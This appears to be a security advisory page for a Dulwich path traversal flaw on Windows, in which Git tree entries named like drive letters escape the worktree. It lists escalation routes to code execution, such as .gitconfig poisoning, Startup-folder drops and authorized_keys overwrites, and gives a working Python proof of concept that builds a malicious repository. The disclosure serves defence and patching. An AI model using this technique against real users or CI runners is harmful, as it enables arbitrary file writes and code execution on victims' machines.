OFFLINE
Awaiting data
Security intelligence
MajorCritical vulnerability

Dulwich: Arbitrary File Write (RCE) on Windows via Unvalidated Drive Letters in Tree Paths

GitHub Advisories · officialPublished Oct 2, 2026Risk 37/100

### Affected files * `dulwich/index.py` (Methods: `validate_path_element_ntfs`, `_tree_to_fs_path`) * `dulwich/porcelain/__init__.py` (Method: `_checked_worktree_path`) ### Description / Summary A High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject `.git` variants, Alternate Data Streams (ADS), `git~1` short names, and reserved device names, but they completely fail to check for **DOS drive letter prefixes**. A malicious Git tree can contain an entry named `C:`. When Dulwich processes this tree on a Windows client, the string passes the `validate_path_element_ntfs` check. Later, `_tree_to_fs_path` passes this path to `os.path.join(root, b"C:\\\\Users\\\\...")`. On Windows, if the second argument to `os.path.join` contains an absolute drive letter, the `root` path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree. While the standard C `git` client explicitly blocks this via `has_dos_drive_prefix()` in `path.c`, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it. ### Potential impact This vulnerability allows an attacker to achieve **Arbitrary File Write**, which can trivially be escalated to **Remote Code Execution (RCE)** or total system compromise on the victim's Windows machine. Attack vectors include: 1. **Git Config Poisoning (RCE):** Writing a malicious `C:\\Users\\<victim>\\.gitconfig` file to set `core.sshCommand` to an arbitrary executable, granting RCE the next time the user interacts with Git. 2. **Persistence (RCE):** Dropping a malicious executable into `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\`. 3. **SSH Key Overwrite:** Writing to `C:\\Users\\<victim>\\.ssh\\authorized_keys` to compromise remote servers accessible by the victim. 4. **CI/CD Compromise:** If a Windows-based CI/CD runner (e.g., GitHub Actions) automatically clones a malicious pull request, the runner is instantly compromised, potentially leaking repository secrets. ### Proof of Concept (PoC) The following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients. ```python from dulwich.objects import Blob, Tree, Commit from dulwich.repo import Repo import os, tempfile repo_path = tempfile.mkdtemp() repo = Repo.init(repo_path) # 1. Build the payload blob. blob = Blob(); blob.data = b"pwned-by-drive-letter\\n" repo.object_store.add_object(blob) # 2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt evil_txt = Tree(); evil_txt[b"evil.txt"] = (0o100644, blob.id) repo.object_store.add_object(evil_txt) victim_dir = Tree(); victim_dir[b"victim"] = (0o040000, evil_txt.id) repo.object_store.add_object(victim_dir) users_dir = Tree(); users_dir[b"Users"] = (0o040000, victim_dir.id) repo.object_store.add_object(users_dir) # VULNERABILITY: The "C:" directory bypasses validation c_drive = Tree(); c_drive[b"C:"] = (0o040000, users_dir.id) repo.object_store.add_object(c_drive) commit = Commit() commit.tree = c_drive.id commit.message = b"add feature" commit.author = commit.committer = b"attacker <[email protected]>" commit.author_time = commit.commit_time = 1700000000 commit.author_timezone = commit.committer_timezone = 0 repo.object_store.add_object(commit) repo.refs[b"refs/heads/main"] = commit.id print(f"Malicious repo created at {repo_path}") print(f"Clone with: dulwich clone {repo_path} /target/win/worktree") # Result: A Windows checkout of this commit writes the payload directly to C:\\Users\\victim\\evil.txt ```

Upgrade affected packages to a patched version: dulwich 1.2.9.

Vendor
Not specified
Product
dulwich
Exploitation
none known
Evidence
official
CVSS
8.8

This record is attributed to GitHub Advisories. Exploitation status and remediation guidance are kept separate from the vulnerability's technical severity.

Open primary source